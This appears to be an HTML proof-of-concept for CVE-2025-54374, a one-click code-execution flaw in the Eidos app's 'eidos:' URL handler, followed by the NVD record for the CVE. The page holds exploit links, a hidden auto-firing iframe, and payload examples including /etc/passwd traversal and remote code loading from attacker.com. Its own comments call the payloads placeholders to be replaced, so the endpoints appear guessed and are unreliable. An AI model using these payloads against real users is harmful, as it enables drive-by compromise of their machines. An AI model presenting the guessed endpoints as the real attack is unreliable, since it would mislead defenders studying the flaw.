CVE-2025-54374

<!-- HTML PoC: One-Click RCE via eidos: custom URL protocol handler --> <!-- Save as .html and open in browser, then click the link --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CVE-2025-54374 PoC</title> </head> <body> <h1>CVE-2025-54374 - Eidos One-Click RCE</h1> <!-- Malicious eidos: URL crafted to trigger RCE when Eidos app processes it. The payload is embedded in the URL parameters that Eidos parses without sanitization. Replace the payload below with actual exploit code targeting Eidos <= 0.21.0. --> <a id="exploit-link" href="eidos://run?cmd=calc.exe">Click me (Benign Demo)</a> <!-- More realistic malicious payload examples: - eidos://open?file=../../../../etc/passwd (path traversal) - eidos://exec?code=<base64_encoded_payload> (code execution) - eidos://import?url=http://attacker.com/malicious.eidos (remote code loading) --> <br><br> <!-- Auto-trigger variant (works if browser is configured to auto-open protocol handlers) --> <iframe src="eidos://run?cmd=malicious_command" style="display:none;"></iframe> <script> // Auto-redirect variant for demonstration // window.location.href = "eidos://run?cmd=malicious_payload"; </script> </body> </html>

{"cve": {"id": "CVE-2025-54374", "sourceIdentifier": "[email protected]", "published": "2025-10-03T20:15:33.180", "lastModified": "2025-10-24T19:03:30.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Eidos is an extensible framework for Personal Data Management. Versions 0.21.0 and below contain a one-click remote code execution vulnerability. An attacker can exploit this vulnerability by embedding a specially crafted eidos: URL on any website, including a malicious one they control. When a victim visits such a site or clicks on the link, the browser triggers the app’s custom URL handler (eidos:), causing the Eidos application to launch and process the URL, leading to remote code execution on the victim’s machine. This issue does not have a fix as of October 3, 2025"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mayneyao:eidos:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "0.21.0", "matchCriteriaId": "4D7351B0-32EF-4870-8279-9A947AF7D90B"}]}]}], "references": [{"url": "https://github.com/mayneyao/eidos/security/advisories/GHSA-qhhm-56qp-xr2r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/mayneyao/eidos/security/advisories/GHSA-qhhm-56qp-xr2r", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}